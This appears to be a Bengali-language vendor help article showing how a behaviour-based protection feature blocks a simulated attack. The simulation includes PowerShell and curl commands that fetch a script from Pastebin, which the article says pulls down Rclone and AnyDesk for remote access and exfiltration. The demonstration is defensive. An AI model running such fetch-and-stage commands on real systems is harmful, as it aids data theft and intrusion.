ডিনামিক প্রিভেনশন হল একটি আচরণ ভিত্তিক নিরাপত্তা ইঞ্জিন যা হুমকি শনাক্ত হলে আক্রমণ পৃষ্ঠ কমাতে এবং প্রভাবের আগে হুমকিগুলি কমাতে সক্রিয়ভাবে ডিনামিক নিয়ন্ত্রণ প্রয়োগ করে। আরও তথ্যের জন্য, দেখুন What is Dynamic Prevention?
এই নিবন্ধটি বাস্তব-জগত আক্রমণ পরিস্থিতি অনুকরণ করে দেখানো হয়েছে কিভাবে ডিনামিক প্রিভেনশন আপনার নেটওয়ার্ককে সুরক্ষা করে। এই উদাহরণে, একজন ব্যবহারকারী Pastebin থেকে একটি স্ক্রিপ্ট ডাউনলোড করেন যা একটি আক্রমণকারী ভবিষ্যৎ আক্রমণ চালানোর জন্য প্রয়োজনীয় অতিরিক্ত উচ্চ-ঝুঁকির সরঞ্জামগুলি পুনরুদ্ধার করার চেষ্টা করেন। ডিনামিক প্রিভেনশন ক্ষতিকারক আচরণ শনাক্ত করে এবং টুলকে ডাউনলোড করা থেকে ব্লক করে আক্রমণের অগ্রগতি বা যেকোনো প্রভাব ঘটার আগে আক্রমণ আটকায়।
এই আক্রমণের প্রতিক্রিয়া সম্পূর্ণরূপে স্বয়ংক্রিয়। কোনো অতিরিক্ত নিয়ম প্রয়োজন হয় না। মাত্র ডিনামিক প্রিভেনশন সক্রিয় করাই আক্রমণ প্রতিরোধের জন্য যথেষ্ট।
এই আক্রমণটি অনুকরণ করতে:
- উচ্চ-ঝুঁকির টুল ডাউনলোড করুন যা ব্লকড হয়নি
- Pastebin থেকে স্ক্রিপ্টটি ডাউনলোড করুন
- উচ্চ-ঝুঁকির সরঞ্জামগুলি আবার ডাউনলোড করার চেষ্টা করুন। এই সময়, ডাউনলোডটি ব্লক করা হয়েছে।
ডিনামিক প্রিভেনশন শুধুমাত্র তখনই কার্যগুলি ব্লক করে যখন সেগুলি ক্ষতিকারক সিকোয়েন্সের অংশ হয় তা প্রদর্শনের জন্য, প্রথমে Rclone ডাউনলোড করুন যা ফাইল ব্যবস্থার জন্য একটি ওপেন-সোর্স কমান্ড-লাইন টুল। আক্রমণকারীরা সাধারণত Rclone কে পোস্ট-কমপ্রোমাইজ টুল হিসাবে ব্যবহার করে কারণ এটি লেজিটিমেট, শক্তিশালী এবং সাধারণ প্রশাসনিক কার্যকলাপের সাথে মিশে যায়।
Rclone নিম্নলিখিত থেকে ডাউনলোড করুন:
- নিম্নলিখিত URL:
https://downloads.rclone.org/rclone-current-windows-amd64.zip -
উইন্ডোজ ডিভাইসগুলিতে:
- নিম্নলিখিত পাওয়ারশেল কমান্ড:
Open-InBrowser -Url "https://downloads.rclone.org/rclone-current-windows-amd64.zip" -Label "RClone"
- নিম্নলিখিত পাওয়ারশেল কমান্ড:
-
macOS/Linux ডিভাইসগুলিতে:
- নিম্নলিখিত টার্মিনাল কমান্ড:
curl -sSL "https://downloads.rclone.org/rclone-current-windows-amd64.zip"
- নিম্নলিখিত টার্মিনাল কমান্ড:
আক্রমণের সূচনা অনুকরণ করতে, Pastebin থেকে একটি স্ক্রিপ্ট ডাউনলোড করুন যা চালানো হলে সাধারণ আক্রমণকারী সরঞ্জামগুলি ডাউনলোড করে, উদাহরণস্বরূপ, রিমোট অ্যাক্সেস এবং এক্সফিল্ট্রেশনের জন্য Rclone এবং AnyDesk।
Pastebin থেকে স্ক্রিপ্ট ডাউনলোড এবং চালান:
-
উইন্ডোজ ডিভাইসগুলিতে:
- নিম্নলিখিত পাওয়ারশেল কমান্ড:
(New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/C5VxKUpE')
- নিম্নলিখিত পাওয়ারশেল কমান্ড:
-
macOS/Linux ডিভাইসগুলিতে:
- নিম্নলিখিত টার্মিনাল কমান্ড:
curl -sSL "https://pastebin.com/raw/tXhVK2V7"
- নিম্নলিখিত টার্মিনাল কমান্ড:
স্ক্রিপ্ট চালায় এবং সরঞ্জামগুলি ডাউনলোড করে। একটি ডিনামিক নিয়ন্ত্রণ হোস্টে প্রয়োগ করা হয়, যা Threats Dashboard এ Host with Controls উইজেটে প্রদর্শিত হয়। আরও তথ্যের জন্য, দেখুন Using the Security Threats Dashboard.
অনুকৃত আক্রমণে, আক্রমণকারী Rclone ডাউনলোড করার চেষ্টা করেন। তবে, কারণ এই কার্যটি Pastebin থেকে স্ক্রিপ্ট ডাউনলোড করা সন্দেহজনক কার্যকলাপের অনুসরণ করে এবং একটি নিয়ন্ত্রণ প্রয়োগ করা হয়, ডিনামিক প্রিভেনশন Rclone ডাউনলোড ব্লক করে।
Rclone নিম্নলিখিত থেকে ডাউনলোড করুন:
- নিম্নলিখিত URL:
https://downloads.rclone.org/rclone-current-windows-amd64.zip -
উইন্ডোজ ডিভাইসগুলিতে:
- নিম্নলিখিত পাওয়ারশেল কমান্ড:
Open-InBrowser -Url "https://downloads.rclone.org/rclone-current-windows-amd64.zip" -Label "RClone"
- নিম্নলিখিত পাওয়ারশেল কমান্ড:
-
macOS/Linux ডিভাইসগুলিতে:
- নিম্নলিখিত টার্মিনাল কমান্ড:
curl -sSL "https://downloads.rclone.org/rclone-current-windows-amd64.zip"
- নিম্নলিখিত টার্মিনাল কমান্ড:
এই ফাইলের ডাউনলোড নিয়ন্ত্রণ দ্বারা ব্লক করা হয়েছে। ব্লক করা হুমকি Threats Dashboard এ Host with Mitigated Threats উইজেটে প্রদর্শিত হয়।
0 মন্তব্য
মন্তব্যের জন্য নিবন্ধটি বন্ধ করা হয়েছে।